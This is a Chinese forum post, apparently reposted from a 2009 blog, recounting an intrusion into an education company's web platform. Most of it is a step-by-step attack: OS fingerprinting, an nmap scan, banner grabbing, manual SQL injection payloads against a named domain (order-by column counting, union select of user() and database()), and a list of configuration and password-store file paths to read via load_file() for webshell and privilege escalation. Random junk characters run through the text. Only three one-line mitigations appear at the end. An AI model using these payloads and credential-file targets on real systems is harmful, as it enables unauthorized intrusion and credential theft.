题记:
0 m6 d& ^7 e4 ]% Z8 z( J一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
! R) b% J. G5 E第一步:获取需要的信息' }1 a, C/ G+ m) p9 @
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
# E9 x2 S- k" s8 W& m注:以下为保护特用XXX代替敏感信息: [% i6 L1 U9 u7 K x+ [# I
顺手先PING了一下他们的域名:
4 a( [; F6 ?: Rping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)5 L( H$ e# w+ Z# X
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
4 p3 L/ p' _* B1 C# ?顺便了解一下TTL,学好基础知识才能一路顺风:
( n% B' s" w& z' |TTL:(Time To Live ) 生存时间
2 m0 s" y! w( j9 x: E5 ], a/ c. K指定数据包被路由器丢弃之前允许通过的网段数量。8 E+ n! d/ M) [& {) @' ^
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。8 o' p( f5 }- m/ D
使用PING时涉及到的 ICMP 报文类型/ p& M6 i) G2 W7 [$ Z: T( ^
一个为ICMP请求回显(ICMP Echo Request)7 ~: d: r" k. `/ p1 K9 l
一个为ICMP回显应答(ICMP Echo Reply)
* b; w$ l2 Y f; hTTL 字段值可以帮助我们识别操作系统类型。
& T5 d8 y6 }: o8 BUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
# |4 N. ^0 W0 M. D( m' jCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
2 k _9 T# n5 i3 s$ w0 }微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 1288 ~. j, C j1 g C* ^. k
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 322 O; B. t' a7 B/ U( w7 s
当然,返回的TTL值是相同的' ]5 R$ S" v( M' _
但有些情况下有所特殊6 k- b* i$ n' [- Y5 @/ h
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64, j# K7 v) D* N9 [: ]0 C
FreeBSD 4.1, 4.0, 3.4;
, z' b5 j$ E( r, fSun Solaris 2.5.1, 2.6, 2.7, 2.8;3 R5 e$ |" k) q
OpenBSD 2.6, 2.7,; \7 D) c: A; r* v6 [
NetBSD
0 _$ E! G4 J: d4 S, Z7 H, R. m& zHP UX 10.203 Q6 n0 \7 V2 y: K; w
ICMP 回显应答的 TTL 字段值为 255
6 U( y" y* w9 r; P2 x7 @& bWindows 95/98/98SE6 p+ \. _+ _% n1 h& U. P
Windows ME
( a/ K; w4 a v- w0 p; DICMP 回显应答的 TTL 字段值为 32
$ _0 X* @! i+ s2 Q* b; y( pWindows NT4 WRKS
- Z0 t' g: z- X/ ~. E/ ^' PWindows NT4 Server7 a- P* i. i5 ~9 u& t. e: U
Windows 20001 N- M8 n7 R# v! s' A
Windows XP
" n8 Q0 x5 r5 p" @ICMP 回显应答的 TTL 字段值为 128
0 E( S! ~# E! _3 ]1 {这样,我们就可以通过这种方法来辨别操作系统5 c' {8 A2 k; Z# ~* N% H8 s
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的2557 G% V3 M8 z6 H8 @; ?
用NMAP扫描一下:
# C; p( B& b; n$ o1 Wnmap -sT -O XXX.XXX.XXX.XXX
5 Z- j% V3 e6 e+ g, r9 s, H1 q如果没有装WinPcap则会弹出提示:4 k w/ |" M& f' H4 f9 d; X2 ]
WARNING: Could not import all necessary WinPcap functions. You may need to upgr
# w P. X( h3 ~- O- H' i' \ade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
, w( a: B2 k; Q) mode — Nmap may not function completely
) [. |: m3 h1 U1 }TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher- K( J. X5 F& r6 c u2 t. q/ {4 J
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win
6 Q/ ^$ f; N9 U9 h) B Npcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
! M9 e p! |4 `) ]. ]/ s/ Yd later operating sytems and NT 4.0 with SP4 or greater. For previous windows v7 n1 `8 G3 h8 r1 ?
ersions, you may be able to take iphlpapi.dll from another system and place it i
8 n. [3 `& l& j4 q d) |n your system32 dir (e.g. c:\windows\system32).
( I8 |, B9 Z$ b1 }( ~1 IQUITTING!, l9 X- p$ e" s9 {- Z/ G' Z2 o
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
5 i$ I b# W0 `- y6 W& K' ]安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
! n7 @/ M( p9 q- W B6 I- F$ KInteresting ports on XXX.XXX.XXX.XXX:
# e+ A: @& B3 Z# bNot shown: 986 closed ports; m6 r) i7 ?5 M R, O
PORT STATE SERVICE
3 _# M+ E0 I6 J21/tcp open ftp$ i& s# \& S& c9 P# x
22/tcp open ssh8 y0 h, a3 t" o5 v( N) Z
23/tcp open telnet M) |, @: ?9 [" D7 L' x
80/tcp open http
$ Y V. e* [( Q111/tcp open rpcbind
6 g5 M# C! u# M% I. I" S135/tcp filtered msrpc9 G( ]( c- r# s; k5 V4 a- m& e
139/tcp filtered netbios-ssn# j+ g1 t$ d; c# P9 u+ W6 r3 q
445/tcp filtered microsoft-ds" J; b* s+ e3 x$ u2 Z
513/tcp open login2 T" O" G" `( t$ J
514/tcp open shell
; `7 K# F' i) t8 t( e4 v, |593/tcp filtered http-rpc-epmap0 I) W% i/ R. x7 K
1720/tcp filtered H.323/Q.931- l2 \2 P; g1 V( I
3306/tcp open mysql5 n# G9 E" M5 N' E3 Y9 b9 j4 M# n
4444/tcp filtered krb524
( q) C' \. i+ X% L2 gDevice type: WAP
" X% o2 A8 j7 |. |# oRunning: Linux 2.4.X& y k8 P; V4 A$ ~9 N) w
OS details: DD-WRT (Linux 2.4.35s)
& K: Q- ?7 t3 @/ u1 p4 P, hNetwork Distance: 13 hops
3 Z n# w) R7 o5 i8 o看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
) o; V; u, H- Glogin as:# n2 y, ?. r/ ]3 @" p. V
Telnet23端口也是开着的,用telnet 命令链接一下:
4 M. c9 F( T. P9 E6 mtelnet XXX.XXX.XXX.XXX! c# ]) q8 f/ U, T! Y1 k) g5 |
提示:
" i6 |* y+ F) v$ }: a+ }. \Red Hat Enterprise Linux Server release 5.2 (Tikanga)
" S* K) H+ @( _: [! [1 ~9 HKernel 2.6.18-92.el5PAE on an i686
+ N0 U& D/ |# q: z$ k% H/ elogin:
1 e( _$ K" K* j获取HTTP头信息:
9 x# a+ v1 A$ D! v/ l$ u: J Q% U" ^在本地执行如下PHP代码/ h& l8 A3 i8 l: D, ]
<?php
' l3 ?7 \ h ?+ U) t+ Q) H" |9 C; e$url = ‘XXX.XXX.XXX.XXX’;0 n5 M5 F4 W& ~
print_r(get_headers($url));
: s( X$ i# g% J6 Vprint_r(get_headers($url, 1));; n2 c* I2 V! ~$ D3 P& c5 ]/ i
?>
% ^6 q! V9 j, Q! g7 }$ I" |将以上代码保存为PHP文件,执行:
' Y+ ?9 N( c( P9 C( _Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
- y$ r% K2 L- @# [9 Y现在可以得出结论:8 D( |6 q. W9 C$ q
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)% `* T6 K. m4 A6 `' |. i
内核版本:Kernel 2.6.18-92.el5PAE on an i686 Z6 X! X$ O/ [' F9 e) z
WEB服务器版本:nginx/0.7.612 z! @" W3 T' W, C
第二步,开始测试寻找漏洞
7 V2 S. [7 o& L分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
) ?+ T0 V8 W$ N1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
' Q2 c; n" X3 u2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
n% U8 H$ H" [* khttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
% Q* e' |( e# R! U5 k* X- m( ^" j6 Chttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误( G* Y4 \; n) G/ {% r$ y' g3 i
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续3 f. t) e6 [/ d/ Q
3、手工注入:
3 N! c& Y5 [% `9 G4 d注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
$ }# G. b( e H. o% r- I3.1 猜测当前表字段数" d4 x$ ]) }8 N2 O& A- a* [! w4 Q
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
4 Q% c/ m4 N% O" X: a此处猜测有个简单的算法,都是有技巧的吗,呵呵
U) S( z* `9 I. L/ K- C4 }算法简单如下:4 K+ Q$ e% e! C: y$ R/ t
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
% R. S! c. k! j9 ?) q: t, f% Q第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测; [1 B8 p0 F" q' o( ` h
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。+ o+ f7 A% L. h6 g: N7 \6 n
以此来判断,是否过界,配合取中算法猜出字段数。9 C. P% I4 Q8 O# o8 I0 X% t0 H
举例:
* [( m" k1 H- Y; t) Khttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
9 h2 U* q+ `& `# I9 [. `/ y5 _6 nhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误5 f3 G4 l. Z/ X' w. A$ J* h
此时3则为我们要找的字段数。3 O' k3 Q! E6 q. w% \/ B
3.2 配合union联合查询字段在页面所位置
, k/ E. c7 r% Q- d5 V8 n* [; u1 j( N我们已经知道了字段数为3,此时则可以做如下操作:3 c/ R$ D! w* D$ b/ l, H/ {: v- h
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
- y6 ]# U& s* y1 n6 V
. m% W$ X" i( X% ^) [这样就可以测试到哪些字段在页面上有所显示了,如图:
2 X" z3 D# r/ W1 F! H+ c) _% r. a5 d$ Q4 s0 D# o
3.3 查敏感信息- F, w3 c5 @7 u8 Z Z# b; i: F
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。. R) j/ K& C0 Z' A: I7 Y
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
* P& G, W, g" d9 R' O; |3.3.1 先查数据库用户、数据库名,以备后用,如图:
* ?# d3 G0 l* h/ }8 P7 |+ `7 l0 N; e$ Q$ G
得到数据库用户为root、数据库名为DBxx;% J; [) @+ G$ _) Z6 H X+ h
3.3.2 查配置文件. b3 W: E F" A1 W: L: _
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。+ ]( a9 m! |% E% q: v8 o
查看文件有一定的条件限制:
1 ]# r% n% H0 E0 N2 e# n/ e5 b欲读取文件必须在服务器上
& K# } x) g9 c' }: S0 Z& L8 z必须指定文件完整的路径! g! _9 i8 Q6 M' G7 f# i; s1 f
必须有权限读取并且文件必须完全可读, k/ G& x* m0 O' ~
欲读取文件必须小于 max_allowed_packet: K! L# O& @' x: [; w
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。$ {: n: X! V' q1 p# w& W
常用的一些:- y7 L; B: S# I" ?* d7 m
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件; l+ J# ]2 z# s7 v
/usr/local/apache2/conf/httpd.conf
* O6 r4 u3 e5 q" r7 J& ]# z/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
! o# G, D- e$ q! a! I8 d/usr/local/app/php5/lib/php.ini //PHP相关设置3 T4 [" ?6 f' N5 f- `! ^7 N
/etc/sysconfig/iptables //从中得到防火墙规则策略8 v m) w( X; o1 b
/etc/httpd/conf/httpd.conf // apache配置文件
* ~ O+ l. a9 p% f. _; X* E! e/etc/rsyncd.conf //同步程序配置文件
6 Z% L8 T t6 F# t Y/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
* o) Q, _1 u3 d# \ b7 J: F$ {/etc/my.cnf //mysql的配置文件
& x, t0 [6 ?6 p0 O* B4 r$ O/ F/etc/redhat-release //系统版本3 Y" N, S$ \" _8 H* W
/etc/issue# I) G4 ?/ b: l
/etc/issue.net
' t0 E* u# r- E3 @c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码# Y: Y0 [. T D6 Z# n2 Y+ N
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
2 n7 {+ b9 X8 u" @) L( Jc:\Program Files\Serv-U\ServUDaemon.ini$ I# W% R3 y4 H( O% f' A2 }* f
c:\windows\my.ini //MYSQL配置文件
1 W* b7 Y1 y( ~" B2 kc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
' V$ T: j. \1 ~等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件, _( r& d2 \/ [! U5 a. f/ ?
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码* `& ]- ~1 \6 V$ h' a
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此0 W/ e. x! ^! `) B( J
c:\Program Files\RhinoSoft.com\ServUDaemon.exe- [8 h# b8 O1 z& B& ^5 p7 w
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
5 c, t: s: s# [ `# c8 W* T//存储了pcAnywhere的登陆密码7 i- ~2 h2 s: d
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。+ h: ~: H1 q' K9 b$ N* ]5 F$ [, g& f
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。+ x( O, d* ]% [: R
最后:防范措施" O/ {% O2 K5 [- L) D
1、修复PHP注入漏洞;/ V0 g/ ]$ \% z$ [
2、Mysql使用普通权限的用户;
/ d! [$ M. u7 ^3、升级linux内核至最新版本; |
发表于 2013-2-16 22:23:32
收藏
支持
反对